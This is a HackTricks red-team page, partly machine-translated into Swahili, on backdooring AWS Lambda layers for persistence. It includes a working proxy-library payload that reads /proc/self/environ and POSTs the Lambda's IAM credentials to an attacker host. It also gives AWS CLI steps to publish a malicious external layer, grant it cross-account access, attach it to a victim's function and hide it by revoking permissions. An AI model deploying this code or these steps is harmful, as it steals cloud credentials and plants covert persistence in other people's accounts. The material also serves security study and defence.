AWS - Lambda Layers Persistence

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Lambda Layers

A Lambda layer ni archive ya .zip ambayo inaweza kuwa na msimbo wa ziada au maudhui mengine. Layer inaweza kuwa na maktaba, runtime ya kawaida, data, au faili za usanidi.

Inawezekana kujumuisha hadi layers tano kwa kila kazi. Unapojumuisha layer katika kazi, maudhui yanachukuliwa kwenye saraka ya /opt katika mazingira ya utekelezaji.

Kwa default, layers unazounda ni binafsi kwa akaunti yako ya AWS. Unaweza kuchagua kushiriki layer na akaunti nyingine au kufanya layer hiyo kuwa ya umma. Ikiwa kazi zako zinatumia layer ambayo akaunti tofauti ilichapisha, kazi zako zinaweza kuendelea kutumia toleo la layer baada ya kufutwa, au baada ya ruhusa yako ya kufikia layer hiyo kufutwa. Hata hivyo, huwezi kuunda kazi mpya au kuboresha kazi kwa kutumia toleo la layer lililofutwa.

Kazi zilizowekwa kama picha ya kontena hazitumii layers. Badala yake, unapakua runtime unayopendelea, maktaba, na utegemezi mwingine ndani ya picha ya kontena unapojenga picha hiyo.

Python load path

Njia ya kupakia ambayo Python itatumia katika lambda ni ifuatayo:

['/var/task', '/opt/python/lib/python3.9/site-packages', '/opt/python', '/var/runtime', '/var/lang/lib/python39.zip', '/var/lang/lib/python3.9', '/var/lang/lib/python3.9/lib-dynload', '/var/lang/lib/python3.9/site-packages', '/opt/python/lib/python3.9/site-packages']

Check how the second and third positions are occupy by directories where lambda layers uncompress their files: /opt/python/lib/python3.9/site-packages and /opt/python

If an attacker managed to backdoor a used lambda layer or add one that will be executing arbitrary code when a common library is loaded, he will be able to execute malicious code with each lambda invocation.

Therefore, the requisites are:

Check libraries that are loaded by the victims code
Create a proxy library with lambda layers that will execute custom code and load the original library.

Preloaded libraries

When abusing this technique I found a difficulty: Some libraries are already loaded in python runtime when your code gets executed. I was expecting to find things like os or sys, but even json library was loaded. In order to abuse this persistence technique, the code needs to load a new library that isn't loaded when the code gets executed.

With a python code like this one it's possible to obtain the list of libraries that are pre loaded inside python runtime in lambda:

import sys

def lambda_handler(event, context):
return {
'statusCode': 200,
'body': str(sys.modules.keys())
}

Na hii ni orodha (hakikisha kwamba maktaba kama os au json tayari zipo)

'sys', 'builtins', '_frozen_importlib', '_imp', '_thread', '_warnings', '_weakref', '_io', 'marshal', 'posix', '_frozen_importlib_external', 'time', 'zipimport', '_codecs', 'codecs', 'encodings.aliases', 'encodings', 'encodings.utf_8', '_signal', 'encodings.latin_1', '_abc', 'abc', 'io', '__main__', '_stat', 'stat', '_collections_abc', 'genericpath', 'posixpath', 'os.path', 'os', '_sitebuiltins', 'pwd', '_locale', '_bootlocale', 'site', 'types', 'enum', '_sre', 'sre_constants', 'sre_parse', 'sre_compile', '_heapq', 'heapq', 'itertools', 'keyword', '_operator', 'operator', 'reprlib', '_collections', 'collections', '_functools', 'functools', 'copyreg', 're', '_json', 'json.scanner', 'json.decoder', 'json.encoder', 'json', 'token', 'tokenize', 'linecache', 'traceback', 'warnings', '_weakrefset', 'weakref', 'collections.abc', '_string', 'string', 'threading', 'atexit', 'logging', 'awslambdaric', 'importlib._bootstrap', 'importlib._bootstrap_external', 'importlib', 'awslambdaric.lambda_context', 'http', 'email', 'email.errors', 'binascii', 'email.quoprimime', '_struct', 'struct', 'base64', 'email.base64mime', 'quopri', 'email.encoders', 'email.charset', 'email.header', 'math', '_bisect', 'bisect', '_random', '_sha512', 'random', '_socket', 'select', 'selectors', 'errno', 'array', 'socket', '_datetime', 'datetime', 'urllib', 'urllib.parse', 'locale', 'calendar', 'email._parseaddr', 'email.utils', 'email._policybase', 'email.feedparser', 'email.parser', 'uu', 'email._encoded_words', 'email.iterators', 'email.message', '_ssl', 'ssl', 'http.client', 'runtime_client', 'numbers', '_decimal', 'decimal', '__future__', 'simplejson.errors', 'simplejson.raw_json', 'simplejson.compat', 'simplejson._speedups', 'simplejson.scanner', 'simplejson.decoder', 'simplejson.encoder', 'simplejson', 'awslambdaric.lambda_runtime_exception', 'awslambdaric.lambda_runtime_marshaller', 'awslambdaric.lambda_runtime_client', 'awslambdaric.bootstrap', 'awslambdaric.__main__', 'lambda_function'

Na hii ni orodha ya maktaba ambazo lambda inajumuisha zilizowekwa kwa chaguo-msingi: https://gist.github.com/gene1wood/4a052f39490fae00e0c3

Lambda Layer Backdooring

Katika mfano huu hebu tuone kwamba msimbo unaolengwa unatumia csv. Tunakwenda kufanya backdoor kwenye uagizaji wa maktaba ya csv.

Ili kufanya hivyo, tutaunda directory csv yenye faili __init__.py ndani yake katika njia ambayo inapakuliwa na lambda: /opt/python/lib/python3.9/site-packages Kisha, wakati lambda inatekelezwa na kujaribu kupakua csv, faili yetu ya __init__.py itapakuliwa na kutekelezwa. Faili hii lazima:

Itekeleze payload yetu
Ipakue maktaba ya csv asilia

Tunaweza kufanya yote mawili kwa:

import sys
from urllib import request

with open("/proc/self/environ", "rb") as file:
url= "https://attacker13123344.com/" #Change this to your server
req = request.Request(url, data=file.read(), method="POST")
response = request.urlopen(req)

# Remove backdoor directory from path to load original library
del_path_dir = "/".join(__file__.split("/")[:-2])
sys.path.remove(del_path_dir)

# Remove backdoored loaded library from sys.modules
del sys.modules[__file__.split("/")[-2]]

# Load original library
import csv as _csv

sys.modules["csv"] = _csv

Kisha, tengeneza zip na hii code katika njia python/lib/python3.9/site-packages/__init__.py na uiweke kama lambda layer.

Unaweza kupata hii code katika https://github.com/carlospolop/LambdaLayerBackdoor

Payload iliyounganishwa it tuma IAM creds kwa seva WAKATI WA KWANZA inapoanzishwa au BAADA ya kurekebisha kontena la lambda (mabadiliko ya code au lambda baridi), lakini mbinu nyingine kama ifuatavyo zinaweza pia kuunganishwa:

External Layers

Kumbuka kwamba inawezekana kutumia lambda layers kutoka kwa akaunti za nje. Aidha, lambda inaweza kutumia layer kutoka kwa akaunti ya nje hata kama haina ruhusa. Pia kumbuka kwamba idadi ya juu ya layers ambazo lambda inaweza kuwa nazo ni 5.

Hivyo, ili kuboresha uwezo wa mbinu hii mshambuliaji anaweza:

Backdoor layer iliyopo ya mtumiaji (hakuna kitu ni cha nje)
Tengeneza layer katika akaunti yake, mpe akaunti ya mwathirika ruhusa ya kutumia layer, sanidi layer katika Lambda ya wahanga na ondoa ruhusa.
Lambda bado itakuwa na uwezo wa kutumia layer na mwathirika hata hana njia rahisi ya kupakua code za layers (kando na kupata rev shell ndani ya lambda)
Mwathirika hataona layers za nje zinazotumika na aws lambda list-layers

# Upload backdoor layer
aws lambda publish-layer-version --layer-name "ExternalBackdoor" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"

# Give everyone access to the lambda layer
## Put the account number in --principal to give access only to an account
aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 --principal '*' --action lambda:GetLayerVersion

## Add layer to victims Lambda

# Remove permissions
aws lambda remove-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

PreviousAWS - Abusing Lambda Extensions NextAWS - Lightsail Persistence

Last updated 3 days ago